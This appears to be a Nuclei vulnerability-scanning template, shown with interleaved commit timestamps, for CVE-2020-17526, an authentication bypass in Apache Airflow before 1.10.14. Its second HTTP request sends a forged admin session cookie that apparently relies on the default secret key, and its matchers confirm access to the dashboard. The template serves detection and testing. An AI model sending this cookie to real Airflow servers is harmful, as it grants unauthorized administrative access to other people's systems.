2022-08-25 10:16:13 +00:00
id : CVE-2020-17526
info :
2022-10-19 21:11:27 +00:00
name : Apache Airflow <1.10.14 - Authentication Bypass
2022-08-25 10:16:13 +00:00
author : piyushchhiroliya
severity : high
2022-08-25 13:46:09 +00:00
description : |
2022-10-19 21:11:27 +00:00
Apache Airflow prior to 1.10.14 contains an authentication bypass vulnerability via incorrect session validation with default configuration. An attacker on site A can access unauthorized Airflow on site B through the site A session.
2023-09-06 12:22:36 +00:00
remediation : Change default value for [webserver] secret_key config.
2022-08-25 10:16:13 +00:00
reference :
2022-08-25 13:46:09 +00:00
- https://kloudle.com/academy/authentication-bypass-in-apache-airflow-cve-2020-17526-and-aws-cloud-platform-compromise
2022-08-30 11:02:05 +00:00
- https://lists.apache.org/thread.html/rbeeb73a6c741f2f9200d83b9c2220610da314810c4e8c9cf881d47ef%40%3Cusers.airflow.apache.org%3E
- http://www.openwall.com/lists/oss-security/2020/12/21/1
2022-10-19 21:11:27 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-17526
2023-07-11 19:49:27 +00:00
- https://lists.apache.org/thread.html/r466759f377651f0a690475d5a52564d0e786e82c08d5a5730a4f8352@%3Cannounce.apache.org%3E
2022-08-25 10:16:13 +00:00
classification :
2022-08-30 11:02:05 +00:00
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score : 7.7
2022-08-25 10:16:13 +00:00
cve-id : CVE-2020-17526
2022-10-19 21:11:27 +00:00
cwe-id : CWE-287
2023-08-31 11:46:18 +00:00
epss-score : 0.03274
epss-percentile : 0.90012
2023-09-06 12:22:36 +00:00
cpe : cpe:2.3:a:apache:airflow:*:*:*:*:*:*:*:*
2022-08-25 13:46:09 +00:00
metadata :
2023-06-04 08:13:42 +00:00
verified : true
2023-09-06 12:22:36 +00:00
max-request : 2
2023-07-11 19:49:27 +00:00
vendor : apache
product : airflow
2023-09-06 12:22:36 +00:00
fofa-query : Apache Airflow
2022-08-25 13:46:09 +00:00
tags : cve,cve2020,apache,airflow,auth-bypass
2022-08-25 10:16:13 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-08-25 10:16:13 +00:00
- raw :
- |
GET /admin/ HTTP/1.1
Host : {{Hostname}}
2022-08-30 10:45:32 +00:00
- |
GET /admin/ HTTP/1.1
Host : {{Hostname}}
2022-08-25 10:16:13 +00:00
Cookie : session=.eJwlzUEOwiAQRuG7zLoLpgMM9DIE6D-xqdEEdGW8u03cvy_vQ8UG5o02q_eJhcqx00YdDaKao6p5ZZe89ZyFUaPExqCF-hxWXs8Tj6tXt_rGnKpxC6vviTNiELBxErerBBZk9Zd7T4z_hOn7A0cWI94.YwJ5bw.LzJjDflCTQE2BfJ7kXcsOi49vvY
2022-08-30 10:45:32 +00:00
req-condition : true
2023-07-11 19:49:27 +00:00
2022-08-25 10:56:54 +00:00
matchers-condition : and
2022-08-25 10:16:13 +00:00
matchers :
2023-07-11 19:49:27 +00:00
- type : dsl
dsl :
- "contains(body_1, 'Redirecting...')"
- "status_code_1 == 302"
condition : and
2022-08-25 10:16:13 +00:00
- type : word
2022-08-30 10:45:32 +00:00
part : body_2
2022-08-25 10:16:13 +00:00
words :
- "DAG"
- "Recent Tasks"
- "Users"
- "SLA Misses"
- "Task Instances"
condition : and